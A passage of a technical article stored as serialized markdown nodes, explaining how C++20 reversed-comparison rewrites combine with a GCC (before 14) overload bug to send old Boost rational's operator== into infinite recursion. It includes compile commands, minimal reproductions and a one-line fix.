5,"tag":216,"props":94674,"children":94675},{"style":6936},[94676],{"type":31,"value":7059},{"type":25,"tag":216,"props":94678,"children":94679},{"style":6947},[94680],{"type":31,"value":94681}," b",{"type":25,"tag":216,"props":94683,"children":94684},{"style":6964},[94685],{"type":31,"value":18761},{"type":25,"tag":216,"props":94687,"children":94688},{"class":6922,"line":7604},[94689,94694,94698,94703,94707],{"type":25,"tag":216,"props":94690,"children":94691},{"style":6964},[94692],{"type":31,"value":94693},"    std::cout ",{"type":25,"tag":216,"props":94695,"children":94696},{"style":6953},[94697],{"type":31,"value":94529},{"type":25,"tag":216,"props":94699,"children":94700},{"style":8205},[94701],{"type":31,"value":94702}," \"g++ \u003C14 resolved non-member\"",{"type":25,"tag":216,"props":94704,"children":94705},{"style":6953},[94706],{"type":31,"value":94539},{"type":25,"tag":216,"props":94708,"children":94709},{"style":6964},[94710],{"type":31,"value":94544},{"type":25,"tag":216,"props":94712,"children":94713},{"class":6922,"line":7613},[94714,94718,94722],{"type":25,"tag":216,"props":94715,"children":94716},{"style":6973},[94717],{"type":31,"value":20947},{"type":25,"tag":216,"props":94719,"children":94720},{"style":6936},[94721],{"type":31,"value":13012},{"type":25,"tag":216,"props":94723,"children":94724},{"style":6964},[94725],{"type":31,"value":6967},{"type":25,"tag":216,"props":94727,"children":94728},{"class":6922,"line":7636},[94729],{"type":25,"tag":216,"props":94730,"children":94731},{"style":6964},[94732],{"type":31,"value":7874},{"type":25,"tag":216,"props":94734,"children":94735},{"class":6922,"line":7645},[94736],{"type":25,"tag":216,"props":94737,"children":94738},{"emptyLinePlaceholder":16},[94739],{"type":31,"value":7642},{"type":25,"tag":216,"props":94741,"children":94742},{"class":6922,"line":7654},[94743,94747,94752],{"type":25,"tag":216,"props":94744,"children":94745},{"style":6936},[94746],{"type":31,"value":23007},{"type":25,"tag":216,"props":94748,"children":94749},{"style":7047},[94750],{"type":31,"value":94751}," main",{"type":25,"tag":216,"props":94753,"children":94754},{"style":6964},[94755],{"type":31,"value":19694},{"type":25,"tag":216,"props":94757,"children":94758},{"class":6922,"line":7722},[94759,94764,94768,94772,94776],{"type":25,"tag":216,"props":94760,"children":94761},{"style":6964},[94762],{"type":31,"value":94763},"    rational",{"type":25,"tag":216,"props":94765,"children":94766},{"style":6953},[94767],{"type":31,"value":9757},{"type":25,"tag":216,"props":94769,"children":94770},{"style":6936},[94771],{"type":31,"value":23007},{"type":25,"tag":216,"props":94773,"children":94774},{"style":6953},[94775],{"type":31,"value":5902},{"type":25,"tag":216,"props":94777,"children":94778},{"style":6964},[94779],{"type":31,"value":94780}," r;\n",{"type":25,"tag":216,"props":94782,"children":94783},{"class":6922,"line":7730},[94784,94788,94793,94797,94801],{"type":25,"tag":216,"props":94785,"children":94786},{"style":6973},[94787],{"type":31,"value":20947},{"type":25,"tag":216,"props":94789,"children":94790},{"style":6964},[94791],{"type":31,"value":94792}," r ",{"type":25,"tag":216,"props":94794,"children":94795},{"style":6953},[94796],{"type":31,"value":12528},{"type":25,"tag":216,"props":94798,"children":94799},{"style":6989},[94800],{"type":31,"value":6992},{"type":25,"tag":216,"props":94802,"children":94803},{"style":6964},[94804],{"type":31,"value":6967},{"type":25,"tag":216,"props":94806,"children":94807},{"class":6922,"line":7760},[94808],{"type":25,"tag":216,"props":94809,"children":94810},{"style":6964},[94811],{"type":31,"value":7874},{"type":25,"tag":2039,"props":94813,"children":94814},{},[94815],{"type":25,"tag":2043,"props":94816,"children":94817},{},[94818],{"type":31,"value":94819},"Compile with g++\u003C14:",{"type":25,"tag":206,"props":94821,"children":94823},{"code":94822,"language":8190,"meta":7,"className":8191,"style":7},"g++ -std=c++17 main.cpp -o test && ./test\n",[94824],{"type":25,"tag":82,"props":94825,"children":94826},{"__ignoreMap":7},[94827],{"type":25,"tag":216,"props":94828,"children":94829},{"class":6922,"line":6923},[94830,94835,94840,94845,94850,94854,94859],{"type":25,"tag":216,"props":94831,"children":94832},{"style":7047},[94833],{"type":31,"value":94834},"g++",{"type":25,"tag":216,"props":94836,"children":94837},{"style":8205},[94838],{"type":31,"value":94839}," -std=c++17",{"type":25,"tag":216,"props":94841,"children":94842},{"style":8205},[94843],{"type":31,"value":94844}," main.cpp",{"type":25,"tag":216,"props":94846,"children":94847},{"style":8205},[94848],{"type":31,"value":94849}," -o",{"type":25,"tag":216,"props":94851,"children":94852},{"style":8205},[94853],{"type":31,"value":34639},{"type":25,"tag":216,"props":94855,"children":94856},{"style":6964},[94857],{"type":31,"value":94858}," && ",{"type":25,"tag":216,"props":94860,"children":94861},{"style":7047},[94862],{"type":31,"value":94863},"./test\n",{"type":25,"tag":38,"props":94865,"children":94866},{},[94867],{"type":31,"value":94868},"Output (on g++ 11.4):",{"type":25,"tag":206,"props":94870,"children":94872},{"code":94871},"g++ \u003C14 resolved non-member\n",[94873],{"type":25,"tag":82,"props":94874,"children":94875},{"__ignoreMap":7},[94876],{"type":31,"value":94871},{"type":25,"tag":2039,"props":94878,"children":94879},{},[94880],{"type":25,"tag":2043,"props":94881,"children":94882},{},[94883],{"type":31,"value":94884},"Compile with clang++:",{"type":25,"tag":206,"props":94886,"children":94888},{"code":94887,"language":8190,"meta":7,"className":8191,"style":7},"clang++ -std=c++17 main.cpp -o test && ./test\n",[94889],{"type":25,"tag":82,"props":94890,"children":94891},{"__ignoreMap":7},[94892],{"type":25,"tag":216,"props":94893,"children":94894},{"class":6922,"line":6923},[94895,94900,94904,94908,94912,94916,94920],{"type":25,"tag":216,"props":94896,"children":94897},{"style":7047},[94898],{"type":31,"value":94899},"clang++",{"type":25,"tag":216,"props":94901,"children":94902},{"style":8205},[94903],{"type":31,"value":94839},{"type":25,"tag":216,"props":94905,"children":94906},{"style":8205},[94907],{"type":31,"value":94844},{"type":25,"tag":216,"props":94909,"children":94910},{"style":8205},[94911],{"type":31,"value":94849},{"type":25,"tag":216,"props":94913,"children":94914},{"style":8205},[94915],{"type":31,"value":34639},{"type":25,"tag":216,"props":94917,"children":94918},{"style":6964},[94919],{"type":31,"value":94858},{"type":25,"tag":216,"props":94921,"children":94922},{"style":7047},[94923],{"type":31,"value":94863},{"type":25,"tag":38,"props":94925,"children":94926},{},[94927],{"type":31,"value":94928},"Output:",{"type":25,"tag":206,"props":94930,"children":94932},{"code":94931},"clang++ resolved member\n",[94933],{"type":25,"tag":82,"props":94934,"children":94935},{"__ignoreMap":7},[94936],{"type":31,"value":94931},{"type":25,"tag":38,"props":94938,"children":94939},{},[94940],{"type":31,"value":94941},"In short, the wrong function gets picked. G++ was broken here until v14.",{"type":25,"tag":22753,"props":94943,"children":94944},{},[],{"type":25,"tag":26,"props":94946,"children":94948},{"id":94947},"part-ii-c20s-symmetric-comparison-feature",[94949],{"type":31,"value":94950},"Part II: C++20’s Symmetric Comparison Feature",{"type":25,"tag":606,"props":94952,"children":94954},{"id":94953},"what-changed-in-c20",[94955],{"type":31,"value":94956},"What Changed in C++20?",{"type":25,"tag":38,"props":94958,"children":94959},{},[94960,94962,94975,94976,94981],{"type":31,"value":94961},"C++20 introduced the ",{"type":25,"tag":162,"props":94963,"children":94966},{"href":94964,"rel":94965},"https://en.cppreference.com/w/cpp/language/operator_comparison",[166],[94967,94969],{"type":31,"value":94968},"spaceship operator ",{"type":25,"tag":82,"props":94970,"children":94972},{"className":94971},[],[94973],{"type":31,"value":94974},"\u003C=>",{"type":31,"value":1307},{"type":25,"tag":9273,"props":94977,"children":94978},{},[94979],{"type":31,"value":94980},"defaulted comparison rewrites",{"type":31,"value":179},{"type":25,"tag":38,"props":94983,"children":94984},{},[94985,94987,94992],{"type":31,"value":94986},"When you define a two-argument ",{"type":25,"tag":82,"props":94988,"children":94990},{"className":94989},[],[94991],{"type":31,"value":94226},{"type":31,"value":94993},", C++20 may implicitly define the \"reversed\" version:",{"type":25,"tag":2039,"props":94995,"children":94996},{},[94997,95008],{"type":25,"tag":2043,"props":94998,"children":94999},{},[95000,95002],{"type":31,"value":95001},"If you define: ",{"type":25,"tag":82,"props":95003,"children":95005},{"className":95004},[],[95006],{"type":31,"value":95007},"bool operator==(T1, T2);",{"type":25,"tag":2043,"props":95009,"children":95010},{},[95011,95013,95019],{"type":31,"value":95012},"Then ",{"type":25,"tag":82,"props":95014,"children":95016},{"className":95015},[],[95017],{"type":31,"value":95018},"T2 == T1",{"type":31,"value":95020}," may call the same function by reversing the arguments.",{"type":25,"tag":38,"props":95022,"children":95023},{},[95024,95026,95031,95032,95037,95039,95045,95047,95052],{"type":31,"value":95025},"This rewrite is ",{"type":25,"tag":9273,"props":95027,"children":95028},{},[95029],{"type":31,"value":95030},"recursive",{"type":31,"value":19288},{"type":25,"tag":82,"props":95033,"children":95035},{"className":95034},[],[95036],{"type":31,"value":94218},{"type":31,"value":95038}," becomes ",{"type":25,"tag":82,"props":95040,"children":95042},{"className":95041},[],[95043],{"type":31,"value":95044},"b == a",{"type":31,"value":95046},", which becomes ",{"type":25,"tag":82,"props":95048,"children":95050},{"className":95049},[],[95051],{"type":31,"value":94218},{"type":31,"value":95053}," again, and so on — if not handled carefully.",{"type":25,"tag":38,"props":95055,"children":95056},{},[95057],{"type":31,"value":95058},"This is great for reducing boilerplate — unless the call becomes ambiguous or self-referential.",{"type":25,"tag":22753,"props":95060,"children":95061},{},[],{"type":25,"tag":26,"props":95063,"children":95065},{"id":95064},"part-iii-the-boost-trapdoor",[95066],{"type":31,"value":95067},"Part III: The Boost Trapdoor",{"type":25,"tag":38,"props":95069,"children":95070},{},[95071,95073,95079,95081,95086],{"type":31,"value":95072},"The old Boost ",{"type":25,"tag":82,"props":95074,"children":95076},{"className":95075},[],[95077],{"type":31,"value":95078},"rational",{"type":31,"value":95080}," class (prior to v1.75) defined both member function and non-member function of ",{"type":25,"tag":82,"props":95082,"children":95084},{"className":95083},[],[95085],{"type":31,"value":94226},{"type":31,"value":1472},{"type":25,"tag":206,"props":95088,"children":95090},{"code":95089,"language":33072,"meta":7,"className":33070,"style":7},"template \u003Cclass Arg, class IntType>\ntemplate \u003Ctypename IntType>\nclass rational\n{\n    ...\npublic:\n    ...\n    \n    template \u003Cclass T>\n    BOOST_CONSTEXPR typename boost::enable_if_c\u003Crational_detail::is_compatible_integer\u003CT, IntType>::value, bool>::type operator== (const T& i) const\n    {\n       return ((den == IntType(1)) && (num == i));\n    }\n    ...\n}\n\ntemplate \u003Cclass Arg, class IntType>\nBOOST_CONSTEXPR\ninline typename boost::enable_if_c \u003C\n   rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n   operator == (const Arg& b, const rational\u003CIntType>& a)\n{\n      return a == b; \n}\n",[95091],{"type":25,"tag":82,"props":95092,"children":95093},{"__ignoreMap":7},[95094,95129,95152,95164,95171,95178,95185,95192,95199,95222,95310,95317,95368,95375,95382,95389,95396,95431,95439,95467,95506,95571,95578,95598],{"type":25,"tag":216,"props":95095,"children":95096},{"class":6922,"line":6923},[95097,95101,95105,95109,95113,95117,95121,95125],{"type":25,"tag":216,"props":95098,"children":95099},{"style":6936},[95100],{"type":31,"value":70185},{"type":25,"tag":216,"props":95102,"children":95103},{"style":6964},[95104],{"type":31,"value":12672},{"type":25,"tag":216,"props":95106,"children":95107},{"style":6936},[95108],{"type":31,"value":74380},{"type":25,"tag":216,"props":95110,"children":95111},{"style":7375},[95112],{"type":31,"value":94600},{"type":25,"tag":216,"props":95114,"children":95115},{"style":6964},[95116],{"type":31,"value":7026},{"type":25,"tag":216,"props":95118,"children":95119},{"style":6936},[95120],{"type":31,"value":74380},{"type":25,"tag":216,"props":95122,"children":95123},{"style":7375},[95124],{"type":31,"value":94419},{"type":25,"tag":216,"props":95126,"children":95127},{"style":6964},[95128],{"type":31,"value":9943},{"type":25,"tag":216,"props":95130,"children":95131},{"class":6922,"line":6769},[95132,95136,95140,95144,95148],{"type":25,"tag":216,"props":95133,"children":95134},{"style":6936},[95135],{"type":31,"value":70185},{"type":25,"tag":216,"props":95137,"children":95138},{"style":6964},[95139],{"type":31,"value":12672},{"type":25,"tag":216,"props":95141,"children":95142},{"style":6936},[95143],{"type":31,"value":94414},{"type":25,"tag":216,"props":95145,"children":95146},{"style":7375},[95147],{"type":31,"value":94419},{"type":25,"tag":216,"props":95149,"children":95150},{"style":6964},[95151],{"type":31,"value":9943},{"type":25,"tag":216,"props":95153,"children":95154},{"class":6922,"line":6778},[95155,95159],{"type":25,"tag":216,"props":95156,"children":95157},{"style":6936},[95158],{"type":31,"value":74380},{"type":25,"tag":216,"props":95160,"children":95161},{"style":7375},[95162],{"type":31,"value":95163}," rational\n",{"type":25,"tag":216,"props":95165,"children":95166},{"class":6922,"line":7005},[95167],{"type":25,"tag":216,"props":95168,"children":95169},{"style":6964},[95170],{"type":31,"value":14836},{"type":25,"tag":216,"props":95172,"children":95173},{"class":6922,"line":7110},[95174],{"type":25,"tag":216,"props":95175,"children":95176},{"style":6964},[95177],{"type":31,"value":24299},{"type":25,"tag":216,"props":95179,"children":95180},{"class":6922,"line":7216},[95181],{"type":25,"tag":216,"props":95182,"children":95183},{"style":6936},[95184],{"type":31,"value":94447},{"type":25,"tag":216,"props":95186,"children":95187},{"class":6922,"line":7244},[95188],{"type":25,"tag":216,"props":95189,"children":95190},{"style":6964},[95191],{"type":31,"value":24299},{"type":25,"tag":216,"props":95193,"children":95194},{"class":6922,"line":7257},[95195],{"type":25,"tag":216,"props":95196,"children":95197},{"style":6964},[95198],{"type":31,"value":65754},{"type":25,"tag":216,"props":95200,"children":95201},{"class":6922,"line":7275},[95202,95206,95210,95214,95218],{"type":25,"tag":216,"props":95203,"children":95204},{"style":6936},[95205],{"type":31,"value":94455},{"type":25,"tag":216,"props":95207,"children":95208},{"style":6964},[95209],{"type":31,"value":12672},{"type":25,"tag":216,"props":95211,"children":95212},{"style":6936},[95213],{"type":31,"value":74380},{"type":25,"tag":216,"props":95215,"children":95216},{"style":7375},[95217],{"type":31,"value":9870},{"type":25,"tag":216,"props":95219,"children":95220},{"style":6964},[95221],{"type":31,"value":9943},{"type":25,"tag":216,"props":95223,"children":95224},{"class":6922,"line":7296},[95225,95230,95234,95239,95243,95247,95251,95256,95260,95264,95268,95272,95276,95280,95285,95289,95293,95297,95301,95305],{"type":25,"tag":216,"props":95226,"children":95227},{"style":6964},[95228],{"type":31,"value":95229},"    BOOST_CONSTEXPR ",{"type":25,"tag":216,"props":95231,"children":95232},{"style":6936},[95233],{"type":31,"value":94414},{"type":25,"tag":216,"props":95235,"children":95236},{"style":6964},[95237],{"type":31,"value":95238}," boost::enable_if_c\u003Crational_detail::is_compatible_integer\u003C",{"type":25,"tag":216,"props":95240,"children":95241},{"style":7375},[95242],{"type":31,"value":177},{"type":25,"tag":216,"props":95244,"children":95245},{"style":6964},[95246],{"type":31,"value":7026},{"type":25,"tag":216,"props":95248,"children":95249},{"style":7375},[95250],{"type":31,"value":94648},{"type":25,"tag":216,"props":95252,"children":95253},{"style":6964},[95254],{"type":31,"value":95255},">::",{"type":25,"tag":216,"props":95257,"children":95258},{"style":7375},[95259],{"type":31,"value":43115},{"type":25,"tag":216,"props":95261,"children":95262},{"style":6964},[95263],{"type":31,"value":7026},{"type":25,"tag":216,"props":95265,"children":95266},{"style":6936},[95267],{"type":31,"value":33646},{"type":25,"tag":216,"props":95269,"children":95270},{"style":6964},[95271],{"type":31,"value":95255},{"type":25,"tag":216,"props":95273,"children":95274},{"style":7375},[95275],{"type":31,"value":36719},{"type":25,"tag":216,"props":95277,"children":95278},{"style":6936},[95279],{"type":31,"value":94483},{"type":25,"tag":216,"props":95281,"children":95282},{"style":6964},[95283],{"type":31,"value":95284},"== (",{"type":25,"tag":216,"props":95286,"children":95287},{"style":6936},[95288],{"type":31,"value":13611},{"type":25,"tag":216,"props":95290,"children":95291},{"style":7375},[95292],{"type":31,"value":9870},{"type":25,"tag":216,"props":95294,"children":95295},{"style":6936},[95296],{"type":31,"value":7059},{"type":25,"tag":216,"props":95298,"children":95299},{"style":6947},[95300],{"type":31,"value":7354},{"type":25,"tag":216,"props":95302,"children":95303},{"style":6964},[95304],{"type":31,"value":7036},{"type":25,"tag":216,"props":95306,"children":95307},{"style":6936},[95308],{"type":31,"value":95309},"const\n",{"type":25,"tag":216,"props":95311,"children":95312},{"class":6922,"line":7305},[95313],{"type":25,"tag":216,"props":95314,"children":95315},{"style":6964},[95316],{"type":31,"value":33147},{"type":25,"tag":216,"props":95318,"children":95319},{"class":6922,"line":7557},[95320,95325,95330,95334,95338,95342,95346,95350,95354,95359,95363],{"type":25,"tag":216,"props":95321,"children":95322},{"style":6973},[95323],{"type":31,"value":95324},"       return",{"type":25,"tag":216,"props":95326,"children":95327},{"style":6964},[95328],{"type":31,"value":95329}," ((den ",{"type":25,"tag":216,"props":95331,"children":95332},{"style":6953},[95333],{"type":31,"value":12528},{"type":25,"tag":216,"props":95335,"children":95336},{"style":7047},[95337],{"type":31,"value":94419},{"type":25,"tag":216,"props":95339,"children":95340},{"style":6964},[95341],{"type":31,"value":1850},{"type":25,"tag":216,"props":95343,"children":95344},{"style":6989},[95345],{"type":31,"value":184},{"type":25,"tag":216,"props":95347,"children":95348},{"style":6964},[95349],{"type":31,"value":12790},{"type":25,"tag":216,"props":95351,"children":95352},{"style":6953},[95353],{"type":31,"value":77167},{"type":25,"tag":216,"props":95355,"children":95356},{"style":6964},[95357],{"type":31,"value":95358}," (num ",{"type":25,"tag":216,"props":95360,"children":95361},{"style":6953},[95362],{"type":31,"value":12528},{"type":25,"tag":216,"props":95364,"children":95365},{"style":6964},[95366],{"type":31,"value":95367}," i));\n",{"type":25,"tag":216,"props":95369,"children":95370},{"class":6922,"line":7574},[95371],{"type":25,"tag":216,"props":95372,"children":95373},{"style":6964},[95374],{"type":31,"value":7311},{"type":25,"tag":216,"props":95376,"children":95377},{"class":6922,"line":7591},[95378],{"type":25,"tag":216,"props":95379,"children":95380},{"style":6964},[95381],{"type":31,"value":24299},{"type":25,"tag":216,"props":95383,"children":95384},{"class":6922,"line":7604},[95385],{"type":25,"tag":216,"props":95386,"children":95387},{"style":6964},[95388],{"type":31,"value":7874},{"type":25,"tag":216,"props":95390,"children":95391},{"class":6922,"line":7613},[95392],{"type":25,"tag":216,"props":95393,"children":95394},{"emptyLinePlaceholder":16},[95395],{"type":31,"value":7642},{"type":25,"tag":216,"props":95397,"children":95398},{"class":6922,"line":7636},[95399,95403,95407,95411,95415,95419,95423,95427],{"type":25,"tag":216,"props":95400,"children":95401},{"style":6936},[95402],{"type":31,"value":70185},{"type":25,"tag":216,"props":95404,"children":95405},{"style":6964},[95406],{"type":31,"value":12672},{"type":25,"tag":216,"props":95408,"children":95409},{"style":6936},[95410],{"type":31,"value":74380},{"type":25,"tag":216,"props":95412,"children":95413},{"style":7375},[95414],{"type":31,"value":94600},{"type":25,"tag":216,"props":95416,"children":95417},{"style":6964},[95418],{"type":31,"value":7026},{"type":25,"tag":216,"props":95420,"children":95421},{"style":6936},[95422],{"type":31,"value":74380},{"type":25,"tag":216,"props":95424,"children":95425},{"style":7375},[95426],{"type":31,"value":94419},{"type":25,"tag":216,"props":95428,"children":95429},{"style":6964},[95430],{"type":31,"value":9943},{"type":25,"tag":216,"props":95432,"children":95433},{"class":6922,"line":7645},[95434],{"type":25,"tag":216,"props":95435,"children":95436},{"style":6964},[95437],{"type":31,"value":95438},"BOOST_CONSTEXPR\n",{"type":25,"tag":216,"props":95440,"children":95441},{"class":6922,"line":7654},[95442,95447,95452,95457,95462],{"type":25,"tag":216,"props":95443,"children":95444},{"style":6936},[95445],{"type":31,"value":95446},"inline",{"type":25,"tag":216,"props":95448,"children":95449},{"style":6936},[95450],{"type":31,"value":95451}," typename",{"type":25,"tag":216,"props":95453,"children":95454},{"style":6964},[95455],{"type":31,"value":95456}," boost::",{"type":25,"tag":216,"props":95458,"children":95459},{"style":7375},[95460],{"type":31,"value":95461},"enable_if_c",{"type":25,"tag":216,"props":95463,"children":95464},{"style":6953},[95465],{"type":31,"value":95466}," \u003C\n",{"type":25,"tag":216,"props":95468,"children":95469},{"class":6922,"line":7722},[95470,95475,95480,95484,95488,95493,95497,95501],{"type":25,"tag":216,"props":95471,"children":95472},{"style":6964},[95473],{"type":31,"value":95474},"   rational_detail::is_compatible_integer\u003C",{"type":25,"tag":216,"props":95476,"children":95477},{"style":7375},[95478],{"type":31,"value":95479},"Arg",{"type":25,"tag":216,"props":95481,"children":95482},{"style":6964},[95483],{"type":31,"value":7026},{"type":25,"tag":216,"props":95485,"children":95486},{"style":7375},[95487],{"type":31,"value":94648},{"type":25,"tag":216,"props":95489,"children":95490},{"style":6964},[95491],{"type":31,"value":95492},">::value, ",{"type":25,"tag":216,"props":95494,"children":95495},{"style":6936},[95496],{"type":31,"value":33646},{"type":25,"tag":216,"props":95498,"children":95499},{"style":6953},[95500],{"type":31,"value":5902},{"type":25,"tag":216,"props":95502,"children":95503},{"style":6964},[95504],{"type":31,"value":95505},"::type\n",{"type":25,"tag":216,"props":95507,"children":95508},{"class":6922,"line":7730},[95509,95514,95519,95523,95527,95531,95535,95539,95543,95547,95551,95555,95559,95563,95567],{"type":25,"tag":216,"props":95510,"children":95511},{"style":6936},[95512],{"type":31,"value":95513},"   operator",{"type":25,"tag":216,"props":95515,"children":95516},{"style":6964},[95517],{"type":31,"value":95518}," == (",{"type":25,"tag":216,"props":95520,"children":95521},{"style":6936},[95522],{"type":31,"value":13611},{"type":25,"tag":216,"props":95524,"children":95525},{"style":7375},[95526],{"type":31,"value":94600},{"type":25,"tag":216,"props":95528,"children":95529},{"style":6936},[95530],{"type":31,"value":7059},{"type":25,"tag":216,"props":95532,"children":95533},{"style":6947},[95534],{"type":31,"value":94681},{"type":25,"tag":216,"props":95536,"children":95537},{"style":6964},[95538],{"type":31,"value":7026},{"type":25,"tag":216,"props":95540,"children":95541},{"style":6936},[95542],{"type":31,"value":13611},{"type":25,"tag":216,"props":95544,"children":95545},{"style":7375},[95546],{"type":31,"value":94435},{"type":25,"tag":216,"props":95548,"children":95549},{"style":6964},[95550],{"type":31,"value":9757},{"type":25,"tag":216,"props":95552,"children":95553},{"style":7375},[95554],{"type":31,"value":94648},{"type":25,"tag":216,"props":95556,"children":95557},{"style":6964},[95558],{"type":31,"value":5902},{"type":25,"tag":216,"props":95560,"children":95561},{"style":6936},[95562],{"type":31,"value":7059},{"type":25,"tag":216,"props":95564,"children":95565},{"style":6947},[95566],{"type":31,"value":93807},{"type":25,"tag":216,"props":95568,"children":95569},{"style":6964},[95570],{"type":31,"value":7107},{"type":25,"tag":216,"props":95572,"children":95573},{"class":6922,"line":7760},[95574],{"type":25,"tag":216,"props":95575,"children":95576},{"style":6964},[95577],{"type":31,"value":14836},{"type":25,"tag":216,"props":95579,"children":95580},{"class":6922,"line":7768},[95581,95585,95589,95593],{"type":25,"tag":216,"props":95582,"children":95583},{"style":6973},[95584],{"type":31,"value":43320},{"type":25,"tag":216,"props":95586,"children":95587},{"style":6964},[95588],{"type":31,"value":20722},{"type":25,"tag":216,"props":95590,"children":95591},{"style":6953},[95592],{"type":31,"value":12528},{"type":25,"tag":216,"props":95594,"children":95595},{"style":6964},[95596],{"type":31,"value":95597}," b; \n",{"type":25,"tag":216,"props":95599,"children":95600},{"class":6922,"line":7800},[95601],{"type":25,"tag":216,"props":95602,"children":95603},{"style":6964},[95604],{"type":31,"value":7874},{"type":25,"tag":38,"props":95606,"children":95607},{},[95608,95610,95616],{"type":31,"value":95609},"This was designed under C++17 semantics. Back then, ",{"type":25,"tag":82,"props":95611,"children":95613},{"className":95612},[],[95614],{"type":31,"value":95615},"rhs == lhs",{"type":31,"value":95617}," would fall back to member overloads if available. All good.",{"type":25,"tag":38,"props":95619,"children":95620},{},[95621,95623,95628,95629,95635],{"type":31,"value":95622},"But under ",{"type":25,"tag":82,"props":95624,"children":95626},{"className":95625},[],[95627],{"type":31,"value":94172},{"type":31,"value":25464},{"type":25,"tag":82,"props":95630,"children":95632},{"className":95631},[],[95633],{"type":31,"value":95634},"G++ \u003C 14",{"type":31,"value":1472},{"type":25,"tag":2039,"props":95637,"children":95638},{},[95639,95644,95649,95654],{"type":25,"tag":2043,"props":95640,"children":95641},{},[95642],{"type":31,"value":95643},"G++ incorrectly chooses this non-member operator first",{"type":25,"tag":2043,"props":95645,"children":95646},{},[95647],{"type":31,"value":95648},"C++20 reverses the comparison",{"type":25,"tag":2043,"props":95650,"children":95651},{},[95652],{"type":31,"value":95653},"Which calls the same function again with arguments flipped",{"type":25,"tag":2043,"props":95655,"children":95656},{},[95657],{"type":31,"value":95658},"And so on...",{"type":25,"tag":38,"props":95660,"children":95661},{},[95662,95664,95669],{"type":31,"value":95663},"This creates ",{"type":25,"tag":9273,"props":95665,"children":95666},{},[95667],{"type":31,"value":95668},"infinite recursion",{"type":31,"value":179},{"type":25,"tag":38,"props":95671,"children":95672},{},[95673],{"type":31,"value":95674},"A minimal example:",{"type":25,"tag":206,"props":95676,"children":95678},{"code":95677,"language":33072,"meta":7,"className":33070,"style":7},"// g++ -std=c++20 -o crash main.cpp && ./crash\n#include \u003Cboost/rational.hpp>\n\nint main() {\n    boost::rational\u003Cint> r;\n    return r == 0;\n}\n",[95679],{"type":25,"tag":82,"props":95680,"children":95681},{"__ignoreMap":7},[95682,95690,95702,95709,95724,95748,95771],{"type":25,"tag":216,"props":95683,"children":95684},{"class":6922,"line":6923},[95685],{"type":25,"tag":216,"props":95686,"children":95687},{"style":6927},[95688],{"type":31,"value":95689},"// g++ -std=c++20 -o crash main.cpp && ./crash\n",{"type":25,"tag":216,"props":95691,"children":95692},{"class":6922,"line":6769},[95693,95697],{"type":25,"tag":216,"props":95694,"children":95695},{"style":6973},[95696],{"type":31,"value":94386},{"type":25,"tag":216,"props":95698,"children":95699},{"style":8205},[95700],{"type":31,"value":95701}," \u003Cboost/rational.hpp>\n",{"type":25,"tag":216,"props":95703,"children":95704},{"class":6922,"line":6778},[95705],{"type":25,"tag":216,"props":95706,"children":95707},{"emptyLinePlaceholder":16},[95708],{"type":31,"value":7642},{"type":25,"tag":216,"props":95710,"children":95711},{"class":6922,"line":7005},[95712,95716,95720],{"type":25,"tag":216,"props":95713,"children":95714},{"style":6936},[95715],{"type":31,"value":23007},{"type":25,"tag":216,"props":95717,"children":95718},{"style":7047},[95719],{"type":31,"value":94751},{"type":25,"tag":216,"props":95721,"children":95722},{"style":6964},[95723],{"type":31,"value":19694},{"type":25,"tag":216,"props":95725,"children":95726},{"class":6922,"line":7110},[95727,95732,95736,95740,95744],{"type":25,"tag":216,"props":95728,"children":95729},{"style":6964},[95730],{"type":31,"value":95731},"    boost::rational",{"type":25,"tag":216,"props":95733,"children":95734},{"style":6953},[95735],{"type":31,"value":9757},{"type":25,"tag":216,"props":95737,"children":95738},{"style":6936},[95739],{"type":31,"value":23007},{"type":25,"tag":216,"props":95741,"children":95742},{"style":6953},[95743],{"type":31,"value":5902},{"type":25,"tag":216,"props":95745,"children":95746},{"style":6964},[95747],{"type":31,"value":94780},{"type":25,"tag":216,"props":95749,"children":95750},{"class":6922,"line":7216},[95751,95755,95759,95763,95767],{"type":25,"tag":216,"props":95752,"children":95753},{"style":6973},[95754],{"type":31,"value":20947},{"type":25,"tag":216,"props":95756,"children":95757},{"style":6964},[95758],{"type":31,"value":94792},{"type":25,"tag":216,"props":95760,"children":95761},{"style":6953},[95762],{"type":31,"value":12528},{"type":25,"tag":216,"props":95764,"children":95765},{"style":6989},[95766],{"type":31,"value":6992},{"type":25,"tag":216,"props":95768,"children":95769},{"style":6964},[95770],{"type":31,"value":6967},{"type":25,"tag":216,"props":95772,"children":95773},{"class":6922,"line":7244},[95774],{"type":25,"tag":216,"props":95775,"children":95776},{"style":6964},[95777],{"type":31,"value":7874},{"type":25,"tag":38,"props":95779,"children":95780},{},[95781],{"type":31,"value":95782},"Expected output: nothing.",{"type":25,"tag":38,"props":95784,"children":95785},{},[95786],{"type":31,"value":95787},"Actual: segmentation fault (stack overflow).",{"type":25,"tag":38,"props":95789,"children":95790},{},[95791,95793,95800],{"type":31,"value":95792},"This exact pattern was ",{"type":25,"tag":162,"props":95794,"children":95797},{"href":95795,"rel":95796},"https://github.com/boostorg/rational/issues/43",[166],[95798],{"type":31,"value":95799},"reported and fixed in Boost rational",{"type":31,"value":95801},", but only in version 1.75+.",{"type":25,"tag":38,"props":95803,"children":95804},{},[95805],{"type":31,"value":95806},"Here’s the one-line fix:",{"type":25,"tag":206,"props":95808,"children":95810},{"code":95809,"language":44326,"meta":7,"className":44324,"style":7},"template \u003Cclass Arg, class IntType>\nBOOST_CONSTEXPR\ninline typename boost::enable_if_c \u003C\n   rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n   operator == (const Arg& b, const rational\u003CIntType>& a)\n{\n-     return a == b;\n+     return a.operator==(b);\n}\n",[95811],{"type":25,"tag":82,"props":95812,"children":95813},{"__ignoreMap":7},[95814,95822,95829,95837,95845,95853,95860,95868,95876],{"type":25,"tag":216,"props":95815,"children":95816},{"class":6922,"line":6923},[95817],{"type":25,"tag":216,"props":95818,"children":95819},{"style":6964},[95820],{"type":31,"value":95821},"template \u003Cclass Arg, class IntType>\n",{"type":25,"tag":216,"props":95823,"children":95824},{"class":6922,"line":6769},[95825],{"type":25,"tag":216,"props":95826,"children":95827},{"style":6964},[95828],{"type":31,"value":95438},{"type":25,"tag":216,"props":95830,"children":95831},{"class":6922,"line":6778},[95832],{"type":25,"tag":216,"props":95833,"children":95834},{"style":6964},[95835],{"type":31,"value":95836},"inline typename boost::enable_if_c \u003C\n",{"type":25,"tag":216,"props":95838,"children":95839},{"class":6922,"line":7005},[95840],{"type":25,"tag":216,"props":95841,"children":95842},{"style":6964},[95843],{"type":31,"value":95844},"   